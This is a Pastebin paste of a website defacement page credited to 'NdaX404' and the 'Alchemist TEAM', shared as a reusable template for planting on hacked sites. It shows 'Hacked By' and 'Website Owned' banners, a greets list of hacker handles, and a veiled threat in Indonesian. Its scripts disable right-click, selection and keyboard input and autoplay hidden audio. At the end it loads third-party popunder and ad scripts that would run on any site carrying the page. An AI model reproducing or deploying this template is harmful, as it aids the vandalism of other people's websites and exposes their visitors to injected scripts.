Advertisement
NdaX404

Script deface badut galau

Dec 8th, 2016
490
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 11.16 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html>
  3.  
  4. <!-- Mirrored from yjihozosa.ws.gy/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 08 Dec 2016 10:39:35 GMT -->
  5. <head>
  6.     <title>NdaX404 Was Here</title>
  7.     <meta charset="UTF-8">
  8.     <meta name="Author" content="NdaX4043"/>
  9.     <meta name="copyright" content="NdaX404 <3"/>
  10.     <meta name="description" content="Website Owned by NdaX404"/>
  11.     <link href='http://fonts.googleapis.com/css?family=Iceland:400,700' rel='stylesheet' type='text/css'>
  12.     <link href='http://fonts.googleapis.com/css?family=Iceland:400,700' rel='stylesheet' type='text/css'>
  13.     <meta property="og:image" content="">
  14.         <style type="text/css">
  15.             body {
  16.                 overflow:hidden;
  17.                 background-image:url('https://s22.postimg.org/lq5lty0gx/yh8t9em_VAe_Vw3kh1.jpg');
  18.                 background-color: #000000;
  19.                 background-repeat:no-repeat;
  20.                 background-size: 100% ;
  21.                 background-position:top center;
  22.                 margin: 0px;
  23.                 cursor:none;
  24.                 font-family: Iceland, sans-serif;
  25.             }
  26.             a{
  27.                 text-decoration: none;
  28.             }
  29.             h1{
  30.             font-family: Iceland, sans-serif;
  31.             font-size:90px;
  32.             color:#fff;
  33.             margin:0px 0px 0px;
  34.  
  35.             }
  36.             h2{
  37.             font-family: Iceland, sans-serif;
  38.             font-size:40px;
  39.             color:#000;
  40.             margin: 0px;
  41.             text-shadow: 0 0 3px #fff;
  42.  
  43.             }
  44.             p{
  45.             color:#000;
  46.             font-size:25px;
  47.             margin: 0px;
  48.             text-shadow: 0 0 3px #fff;
  49.             }
  50.             .fot{
  51.             font-family: Iceland, sans-serif;
  52.             font-size:14px;
  53.             color:#fff;
  54.             margin: 0px;
  55.             text-shadow: 0 0 3px #000, 0px 0px 5px #000;
  56.             }
  57.              h1{
  58.             color:#000;
  59.             text-shadow: 0 0 5px #fff;
  60.         }
  61.         .greets{
  62.     font-family: Arial, sans-serif;
  63.     line-height: 24px;
  64.     font-size: 11px;
  65.     width: 50%;
  66.     background: #000;
  67.     opacity: 0.9;
  68.     text-transform: uppercase;
  69.     z-index: 9999;
  70.     border-radius:10px;
  71.     -moz-box-shadow: 1px 0px 2px #000;
  72.     -webkit-box-shadow: 1px 0px 2px #000;
  73.     box-shadow: 1px 0px 2px #000;
  74. }
  75.         </style>
  76.     </head>
  77.     <div id="I301_html">
  78. <script type="text/javascript" src="http://code.jquery.com/jquery.min.js"></script>
  79. <script type="text/javascript">setTimeout("$('#loading').fadeOut(5000);", 10000);  </script>
  80. <style type="text/css">#loading{position:fixed;top:0;left:0;padding-top:0px;background-color:#000;width:100%;height:100%;color:black;z-index:9000;overflow:hidden;}</style>
  81. <div id="loading">
  82. <body onload="document.f.p.focus()" topmargin="0" leftmargin="0" bgcolor="#000000" marginheight="0" marginwidth="0">
  83. <table border="0" cellpadding="2" cellspacing="0" width="100%">
  84. <tbody><tr>
  85. </tr>
  86.  
  87. <tr>
  88. </tr>
  89. </tbody></table>
  90. <font id="ResponseData" color="#ff99cc">
  91. <pre><script type="text/javascript">
  92. TypingText = function(element, interval, cursor, finishedCallback) {
  93.   if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
  94.     this.running = true;    // Never run.
  95.     return;
  96.   }
  97.   this.element = element;
  98.   this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
  99.   this.interval = (typeof interval == "undefined" ? 100 : interval);
  100.   this.origText = this.element.innerHTML;
  101.   this.unparsedOrigText = this.origText;
  102.   this.cursor = (cursor ? cursor : "");
  103.   this.currentText = "";
  104.   this.currentChar =0;
  105.   this.element.typingText = this;
  106.   if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
  107.   TypingText.all.push(this);
  108.   this.running = false;
  109.   this.inTag = false;
  110.   this.tagBuffer = "";
  111.   this.inHTMLEntity = false;
  112.   this.HTMLEntityBuffer = "";
  113. }
  114. TypingText.all = new Array();
  115. TypingText.currentIndex = 0;
  116. TypingText.runAll = function() {
  117.   for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
  118. }
  119. TypingText.prototype.run = function() {
  120.  if(this.running) return;
  121.  if(typeof this.origText == "undefined") {
  122.    setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);    // We haven't finished loading yet.  Have patience.
  123.    return;
  124.  }
  125.  if(this.currentText == "") this.element.innerHTML = "";
  126. //  this.origText = this.origText.replace(/<([^<])*>/, "");     // Strip HTML from text.
  127.   if(this.currentChar < this.origText.length) {
  128.    if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
  129.      this.tagBuffer = "<";
  130.      this.inTag = true;
  131.      this.currentChar++;
  132.      this.run();
  133.      return;
  134.    } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
  135.      this.tagBuffer += ">";
  136.       this.inTag = false;
  137.       this.currentText += this.tagBuffer;
  138.       this.currentChar++;
  139.       this.run();
  140.       return;
  141.     } else if(this.inTag) {
  142.       this.tagBuffer += this.origText.charAt(this.currentChar);
  143.       this.currentChar++;
  144.       this.run();
  145.       return;
  146.     } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
  147.      this.HTMLEntityBuffer = "&";
  148.       this.inHTMLEntity = true;
  149.       this.currentChar++;
  150.       this.run();
  151.       return;
  152.     } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
  153.      this.HTMLEntityBuffer += ";";
  154.       this.inHTMLEntity = false;
  155.       this.currentText += this.HTMLEntityBuffer;
  156.       this.currentChar++;
  157.       this.run();
  158.       return;
  159.     } else if(this.inHTMLEntity) {
  160.       this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
  161.       this.currentChar++;
  162.       this.run();
  163.       return;
  164.     } else {
  165.       this.currentText += this.origText.charAt(this.currentChar);
  166.     }
  167.     this.element.innerHTML = this.currentText;
  168.     this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
  169.    this.currentChar++;
  170.    setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
  171.  } else {
  172.    this.currentText = "";
  173.    this.currentChar = 0;
  174.        this.running = false;
  175.        this.finishedCallback();
  176.  }
  177. }
  178. </script>
  179. <script>
  180. function disableselect(e){return false}
  181. function reEnable(){return true}
  182. //if IE4+
  183. document.onselectstart=new Function ("return false")
  184. //if NS6
  185. if (window.sidebar){
  186. document.onmousedown=disableselect
  187. document.onclick=reEnable
  188. }
  189. </script>
  190. <script>
  191. var message="";
  192. function clickIE()
  193. {if (document.all)
  194. {(message);return false;}}
  195. function clickNS(e) {
  196. if
  197. (document.layers||(document.getElementById&&!document.all))
  198. {
  199. if (e.which==2||e.which==3) {(message);return false;}}}
  200. if (document.layers)
  201. {document.captureEvents(Event.MOUSEDOWN);document.  onmousedown=clickNS;}
  202. else
  203. {document.onmouseup=clickNS;document.oncontextmenu  =clickIE;}
  204. document.oncontextmenu=new Function("return false")
  205. </script>
  206. <table style=" background-repeat: no-repeat;"  align="right" border="0" width="100%" >
  207. <br>
  208. <tbody><tr>
  209. <td  valign="top"><p id="hack" >
  210. <br />
  211. <br>
  212. <font color="Green">     <b>[+] kenapa kau meninggalkan aku ?     </font> <br>
  213. <font color="Green">     <b>[+] sebenar nya aku salah apa ?            </font><br>
  214. <font color="Green">     <b>[+]  kok sampai kau tega tinggalkan aku sendiri </font><br>
  215. <font color="Green">     <b>[+] Alchemist TEAM [+] Z-1 IndoXploit  [+] CYBER NUSANTATA                  </font> <br>
  216.                      <font color="Green">
  217.  
  218.  
  219. </p></tr>
  220. </tbody></table>                 </div>
  221. <br>
  222. <script type="text/javascript">
  223. new TypingText(document.getElementById("hack"), 50, function(i){ var ar = new Array("_",""); return " " + ar[i.length % ar.length]; });
  224. TypingText.runAll();
  225. </script>
  226.     <style>
  227.       td
  228.       {
  229.         background-color: #000000;
  230.         font-family: Courier New;
  231.         font-size:20px;
  232.         color:#000000;
  233.         border-color: #000000;
  234.         border-width:1pt;
  235.         border-style:solid;
  236.         border-collapse:collapse;
  237.         padding:0pt 3pt;
  238.         vertical-align:top;
  239.       }
  240.       table
  241.       {
  242.         border-color: #88aace;
  243.         border-width:0pt 1pt;
  244.         border-style:dash;
  245.       }
  246.       A:Link, A:Visited
  247.       {
  248.         color: #88aace;
  249.       }
  250.       A.no:Link, A.no:Visited
  251.       {
  252.         color: #88aace;
  253.         text-decoration: none;
  254.       }
  255.       A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover
  256.       {
  257.         color: #88aace;
  258.         background-color:#2e2e2e;
  259.         text-decoration:
  260.         overline underline;
  261.       }
  262.       .style1
  263.       {
  264.         color: #88aace
  265.       }
  266.       .style2
  267.       {
  268.         color: 1f1f1f
  269.       }
  270.       body
  271.       {
  272.         color:white;
  273.  
  274.         background-position:right;
  275.         background-attachment:fixed;
  276.         </div>
  277.       }
  278.     </style>
  279.  
  280. </div>
  281. </div>
  282. <body oncontextmenu="return false" onkeydown="return false">
  283. <center>
  284. <h2 class="glow">Alchemist TEAM</h2>
  285. <img src="http://oi67.tinypic.com/124zxoy.jpg"width="250"height="250">
  286. <h2 class="glow2" >.::Hacked By::.<br> <span style="color:#000;font-family:Iceland;text-shadow:SkyBlue 0px 0px 10px">./</span><span style="color:#000;font-family:Iceland;text-shadow:red 0px 0px 10px">NdaX404</span></b></h2>
  287. <p><b> Ingat psikopat berasal dari orang orang yg di khianati dan terlalu banyak kegelapan dalam dirinya <span style="font-family:Iceland;color:red;text-shadow:#000 0px 0px 3px">Jangan pernah mengkhianati orang yg dekat dg anda</span>
  288.             Jadi bersyukurlah bahwa anda masih HIDUP untuk saat ini.<font style="color:red;text-shadow:#000 0px 0px 3px"></font><br>#*#*#*#
  289.             </p>
  290.         </span>
  291.             <div style="font-size:10px;color:gold;text-shadow:grey 0px 0px 3px">
  292.         <span style="font-family:Iceland;font-weight:bold;color:#ffffff"><p>~COWOK TERSAKITI TEAM~</p></span>
  293.     </div>
  294. <div class="greets">
  295. <table align=center border="0">
  296. <tr>
  297. <td width=100% id=CROOTZ>
  298. <marquee behavior="scroll" direction="left" scrollamount="4" scrolldelay="55" width="100%">
  299. <font size="5px" style="font-family: Iceland, sans-serif;color:black;text-shadow: 0 0 3px red, 0px 0px 5px red" >
  300. <b>-=|[Mr Z]-[wir-1005]-[S3RVANTIN]-[L45M3M0RyUs404]-[mR.14Zero14]-[site down]-[4LCyb3r0202]-[Mr_M.n.4]-[./IND404!] [JUDGEVAN]-[Mr.J0N35]-[Mr.T4MV4N]-[Mr.L]-[Mr.Amat3urz404]-[MISTER(I)]-[ X(Force_Close)X]-[lawliet L]-[ID-anonyno'S[K]-[Player02]-[Dr.P4kp0LVIRUS]|=-</font>
  301. </marquee>
  302. </td>
  303. </table></div>
  304. <div class="fot">
  305. Copyrights © Original 2016
  306. </div>
  307. </center>
  308. </body>
  309. <object data="http://flash-mp3-player.net/medias/player_mp3.swf" width="0" height="0" type="application/x-shockwave-flash"><param value="#ffffff" name="bgcolor"><param value="mp3=http://zizka.free.fr/_muisc/04-kanye_west-amazing_ft._young_jeezy-(HHKingz.net).mp3&loop=1&autoplay=1&volume=125" name="FlashVars"></object>
  310. <!-- --> <script type='text/javascript' src='http://go.pub2srv.com/apu.php?zoneid=16780'> </script> <script type="text/javascript" src="http://1phads.com/notice.php?p=16781&amp;interactive=1&amp;pushup=1"> </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement